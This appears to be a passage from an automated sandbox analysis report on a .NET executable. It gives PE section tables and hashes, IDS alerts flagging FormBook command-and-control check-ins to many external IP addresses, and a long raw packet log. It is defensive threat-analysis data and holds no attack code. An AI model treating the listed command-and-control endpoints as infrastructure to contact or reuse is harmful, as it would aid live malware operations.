| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xad028 | 0xad200 | 458e283e45bc05eeb264b548ce56e3d3 | False | 0.9282519178700361 | data | 7.8614274357019545 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb0000 | 0x64c | 0x800 | 05971ead7fb3ed00ac1e62bc52bae025 | False | 0.33984375 | data | 3.500453359649115 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb2000 | 0xc | 0x200 | b188ab4c732a131282eaf03796cf7e59 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xb0090 | 0x3bc | data | | | 0.4110878661087866 |
| RT_MANIFEST | 0xb045c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-11T22:54:47.970266+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59660 | 154.23.184.218 | 80 | TCP |
| 2024-09-11T22:55:11.746854+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59665 | 152.53.38.0 | 80 | TCP |
| 2024-09-11T22:55:25.554231+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59669 | 23.225.34.75 | 80 | TCP |
| 2024-09-11T22:55:38.710839+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59673 | 3.33.130.190 | 80 | TCP |
| 2024-09-11T22:55:52.282540+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59677 | 65.108.194.49 | 80 | TCP |
| 2024-09-11T22:56:06.275752+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59681 | 208.91.197.13 | 80 | TCP |
| 2024-09-11T22:56:20.096078+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59685 | 76.223.113.161 | 80 | TCP |
| 2024-09-11T22:56:33.495089+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59689 | 172.67.221.5 | 80 | TCP |
| 2024-09-11T22:56:47.204569+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59693 | 162.240.81.18 | 80 | TCP |
| 2024-09-11T22:57:00.498635+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59697 | 162.0.213.94 | 80 | TCP |
| 2024-09-11T22:57:13.948673+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59701 | 84.32.84.32 | 80 | TCP |
| 2024-09-11T22:57:27.510291+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59705 | 35.214.33.204 | 80 | TCP |
| 2024-09-11T22:57:40.658093+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59709 | 3.33.130.190 | 80 | TCP |
| 2024-09-11T22:57:54.255424+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59713 | 199.59.243.226 | 80 | TCP |
| 2024-09-11T22:58:16.140788+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59717 | 188.114.96.3 | 80 | TCP |
| 2024-09-11T22:58:25.786115+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59718 | 154.23.184.218 | 80 | TCP |
| 2024-09-11T22:58:38.909718+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59722 | 152.53.38.0 | 80 | TCP |
| 2024-09-11T22:58:52.842736+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 59726 | 23.225.34.75 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Sep 11, 2024 22:55:49.964472055 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964518070 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964555979 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964587927 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:49.964591026 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964631081 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964665890 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964669943 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:49.964703083 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964735985 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964766026 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:49.964772940 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964813948 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.964847088 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:49.965194941 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:49.973081112 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.973124027 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.973167896 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:49.973201990 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.017936945 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.074146032 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074188948 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074229956 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074268103 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.074271917 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074311972 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074340105 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.074503899 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074520111 CEST805967665.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:50.074567080 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.074567080 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:50.424345016 CEST5967680192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:51.442831039 CEST5967780192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:51.447799921 CEST805967765.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:51.449954033 CEST5967780192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:51.461838961 CEST5967780192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:51.466686964 CEST805967765.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:52.282370090 CEST805967765.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:52.282428980 CEST805967765.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:52.282540083 CEST5967780192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:52.285200119 CEST5967780192.168.2.765.108.194.49
                                                              Sep 11, 2024 22:55:52.290477991 CEST805967765.108.194.49192.168.2.7
                                                              Sep 11, 2024 22:55:57.603949070 CEST5967880192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:55:57.608900070 CEST8059678208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:55:57.609038115 CEST5967880192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:55:57.619843006 CEST5967880192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:55:57.624707937 CEST8059678208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:55:58.130887985 CEST8059678208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:55:58.132885933 CEST5967880192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:55:59.127408981 CEST5967880192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:55:59.132419109 CEST8059678208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:00.145873070 CEST5967980192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:00.151597023 CEST8059679208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:00.152069092 CEST5967980192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:00.164180994 CEST5967980192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:00.169168949 CEST8059679208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:00.670216084 CEST8059679208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:00.670289993 CEST5967980192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:01.676290035 CEST5967980192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:01.682435989 CEST8059679208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:02.707928896 CEST5968080192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:02.713123083 CEST8059680208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:02.713486910 CEST5968080192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:02.725509882 CEST5968080192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:02.730612040 CEST8059680208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:02.730643034 CEST8059680208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:03.228007078 CEST8059680208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:03.228187084 CEST5968080192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:04.237867117 CEST5968080192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:04.242927074 CEST8059680208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:05.256061077 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:05.261430025 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:05.261519909 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:05.269747972 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:05.274976969 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275540113 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275599003 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275639057 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275676012 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275711060 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275747061 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275752068 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.275752068 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.275783062 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275819063 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.275823116 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275861979 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275899887 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.275943995 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.276057959 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.281511068 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.281546116 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.281582117 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.281619072 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.330504894 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.366597891 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366673946 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366709948 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366731882 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.366746902 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366785049 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366820097 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366822958 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.366869926 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.366933107 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.366971016 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367013931 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.367021084 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367054939 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367089987 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367099047 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.367786884 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367836952 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.367841959 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367894888 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367928982 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.367943048 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.367964983 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368010998 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.368731976 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368782043 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368815899 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368845940 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.368850946 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368889093 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.368897915 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.369679928 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:06.369729042 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.375190973 CEST5968180192.168.2.7208.91.197.13
                                                              Sep 11, 2024 22:56:06.380601883 CEST8059681208.91.197.13192.168.2.7
                                                              Sep 11, 2024 22:56:11.652668953 CEST5968280192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:11.658193111 CEST805968276.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:11.658333063 CEST5968280192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:11.669253111 CEST5968280192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:11.674114943 CEST805968276.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:12.113015890 CEST805968276.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:12.113291025 CEST805968276.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:12.113506079 CEST5968280192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:13.174388885 CEST5968280192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:14.193890095 CEST5968380192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:14.420519114 CEST805968376.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:14.420620918 CEST5968380192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:14.434725046 CEST5968380192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:14.440505981 CEST805968376.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:14.878710985 CEST805968376.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:14.879720926 CEST805968376.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:14.879782915 CEST5968380192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:15.941975117 CEST5968380192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:16.958988905 CEST5968480192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:17.087578058 CEST805968476.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:17.087768078 CEST5968480192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:17.101314068 CEST5968480192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:17.106484890 CEST805968476.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:17.106517076 CEST805968476.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:17.543169022 CEST805968476.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:17.549694061 CEST805968476.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:17.549949884 CEST5968480192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:18.611958027 CEST5968480192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:19.630675077 CEST5968580192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:19.636770964 CEST805968576.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:19.636995077 CEST5968580192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:19.644325018 CEST5968580192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:19.649194002 CEST805968576.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:20.095751047 CEST805968576.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:20.095871925 CEST805968576.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:20.096077919 CEST5968580192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:20.098692894 CEST5968580192.168.2.776.223.113.161
                                                              Sep 11, 2024 22:56:20.103562117 CEST805968576.223.113.161192.168.2.7
                                                              Sep 11, 2024 22:56:25.141769886 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:25.147423983 CEST8059686172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:25.147505045 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:25.159265995 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:25.164225101 CEST8059686172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:25.850508928 CEST8059686172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:25.850532055 CEST8059686172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:25.850649118 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:25.850899935 CEST8059686172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:25.850971937 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:26.674489021 CEST5968680192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:27.693098068 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:27.698631048 CEST8059687172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:27.702038050 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:27.713248014 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:27.727444887 CEST8059687172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:28.425606966 CEST8059687172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:28.425683022 CEST8059687172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:28.425776005 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:28.426311016 CEST8059687172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:28.426359892 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:29.221338987 CEST5968780192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:30.239989042 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:30.244868994 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.245017052 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:30.255604029 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:30.260479927 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.260608912 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.947381020 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.949126005 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.949178934 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:30.949446917 CEST8059688172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:30.949489117 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:31.768209934 CEST5968880192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:32.787338018 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:32.792500973 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:32.792593002 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:32.800508976 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:32.805459023 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:33.494874954 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:33.494895935 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:33.494906902 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:33.495089054 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:33.495209932 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:56:33.495415926 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:33.497652054 CEST5968980192.168.2.7172.67.221.5
                                                              Sep 11, 2024 22:56:33.502490997 CEST8059689172.67.221.5192.168.2.7
                                                              Sep 11, 2024 22:57:35.674063921 CEST5970780192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:36.612165928 CEST5970780192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:36.617170095 CEST80597073.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:37.632756948 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:37.637909889 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:37.638006926 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:37.649007082 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:37.654016018 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:37.654077053 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:38.102821112 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:38.106281996 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:39.159085035 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:39.471493006 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:39.944472075 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:39.944502115 CEST80597083.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:39.946146965 CEST5970880192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.178020954 CEST5970980192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.182948112 CEST80597093.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:40.186244011 CEST5970980192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.193089962 CEST5970980192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.198527098 CEST80597093.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:40.657916069 CEST80597093.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:40.658020973 CEST80597093.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:40.658092976 CEST5970980192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.660944939 CEST5970980192.168.2.73.33.130.190
                                                              Sep 11, 2024 22:57:40.666341066 CEST80597093.33.130.190192.168.2.7
                                                              Sep 11, 2024 22:57:46.142349958 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:46.147259951 CEST8059710199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:46.150144100 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:46.162014961 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:46.166918039 CEST8059710199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:46.635189056 CEST8059710199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:46.635238886 CEST8059710199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:46.635278940 CEST8059710199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:46.635288954 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:46.635325909 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:47.674772978 CEST5971080192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:48.693936110 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:48.699119091 CEST8059711199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:48.699299097 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:48.711452007 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:48.716319084 CEST8059711199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:49.179505110 CEST8059711199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:49.179526091 CEST8059711199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:49.179578066 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:49.179624081 CEST8059711199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:49.179667950 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:50.221729994 CEST5971180192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.240914106 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.247910023 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.247983932 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.260771990 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.266109943 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.266141891 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.739876032 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.739948988 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.740242958 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:51.740384102 CEST8059712199.59.243.226192.168.2.7
                                                              Sep 11, 2024 22:57:51.741251945 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:52.768558025 CEST5971280192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.790010929 CEST5971380192.168.2.7199.59.243.226
                                                              Sep 11, 2024 22:57:53.794823885 CEST8059713199.59.243.226192.168.2.7
